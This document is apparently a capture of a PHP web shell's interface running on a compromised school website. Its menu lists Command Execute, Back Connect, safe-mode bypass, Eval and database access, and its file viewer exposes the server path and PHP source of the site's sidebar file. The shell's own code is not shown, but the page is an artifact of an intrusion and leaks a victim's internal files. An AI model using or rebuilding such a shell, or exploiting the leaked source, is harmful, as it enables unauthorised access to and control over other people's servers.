File Manger -- Command Execute -- Back Connect -- BypasS Command eXecute(SF-DF) -- BypasS Directory -- Eval -- Data Base -- Server Information
File Name : /home/no2airforceschoo/domains/no2airforceschoolgwl.com/public_html/rightsidebar.php <table width="100%" border="0" cellspacing="0" cellpadding="0" style="padding-right:4px;"> <tr><td height="5"></td></tr> <tr> <td class="data"><table width="90%" align="right" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="right_box1"> <tr> <td class="righthead4"><a href="career.php">Career Advertisement</a></td> </tr> </table></td></tr> <tr><td height="20"></td></tr> <tr> <td align="center"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="right_box1"> <tr> <td align="left"><table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td class="righthead1"><a href="news.php">News & Events</a></td> </tr> <tr> <td height="10"></td> </tr> <tr> <td style="overflow:hidden;"> <marquee behavior="scroll" direction="up" scrollamount="2" onmouseover="this.stop();" onmouseout="this.start();" height="200"> <?php $sql = "select * from news order by newsid desc limit 5"; $result = mysqli_query($conn, $sql); while($row = mysqli_fetch_array($result)) { ?> <table width="100%" border="0" cellspacing="0" cellpadding="0"> <tr> <td width="17%" align="center"><img src="images/bulet1.png" /> </td> <td width="77%"><a href="newsdetail.php?newsid=<?php echo $row['newsid'];?>" title="<?php echo $row['newstitle']; ?>"><?php echo $row['newstitle']; ?></a></td> </tr> </table> <?php }?> </marquee> </td> </tr> </table> </td> </tr> <tr> <td height="10"></td> </tr> </table></td> </tr> </table> </td> </tr> <tr><td height="20"></td></tr> <tr><td> <table width="90%" align="right" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="right_box1"> <tr> <td class="righthead1"><a href="video.php">Video</a></td> </tr> <tr> <td> <div class="border"> <a href="video.php"><img src="images/icon_video.jpg" width="100%" /></a> </div> </td> </tr> </table></td></tr></table> </td></tr> <tr><td height="20"></td></tr> <tr><td> <table width="90%" align="right" border="0" cellpadding="0" cellspacing="0"> </table> </td></tr> <tr> <td class="data"><table width="90%" align="right" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="right_box1"> <tr> <td align="left"><table width="100%" border="0" cellpadding="0" cellspacing="0"> <tr> <td class="righthead2"><a href="photogallery.php">Photogallery</a></td> </tr> <tr><td> <div class="border"> <link href="css/default.css" rel="stylesheet" type="text/css" media="all" /> <link href="css/nivo-slider.css" rel="stylesheet" type="text/css" media="all" /> <script src="js/jquery.nivo.slider.js"></script> <script type="text/javascript"> $(window).load(function() { $('#slider').nivoSlider(); }); </script> <div class="slider-wrapper theme-default"> <div id="slider" class="nivoSlider"> <?php $sql_i = "select * from photogallery order by photoid Desc limit 5"; $result_i = mysqli_query($conn, $sql_i); while($row = mysqli_fetch_array($result_i)) { ?> <img src="photogallery/<?php echo $row['gphoto']; ?>" alt="" /> <?php }?> </div> </div> </div> </td></tr> <tr> <td height="10"></td> </tr> <tr> <td> </td> </tr> </table> </td> </tr> </table></td> </tr> </table> </td> </tr> <tr><td height="20"></td></tr> <tr><td> <table width="90%" align="right" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="right_box1"> <tr> <td class="righthead4"><a href="career.php" >Download Admission Form</a></td> </tr> </table></td></tr></table> </td></tr> <tr><td height="20"></td></tr> <tr> <td class="data"><table width="90%" align="right" border="0" cellpadding="0" cellspacing="0"> <tr> <td align="center"><table width="100%" border="0" cellspacing="0" cellpadding="0" class="right_box1"> <tr> <td align="left"><table width="100%" border="0" align="left" cellpadding="0" cellspacing="0"> <tr> <td class="righthead_call">Call Us Now</td> </tr> <tr> <td class="mobile"> 0751 - <br /> 2470775 - 6944</td> </tr> </table> </td> </tr> </table></td> </tr> </table> </td> </tr> <tr><td height="20"></td></tr> </table>
Coded by Amin Shokohi (Pejvak)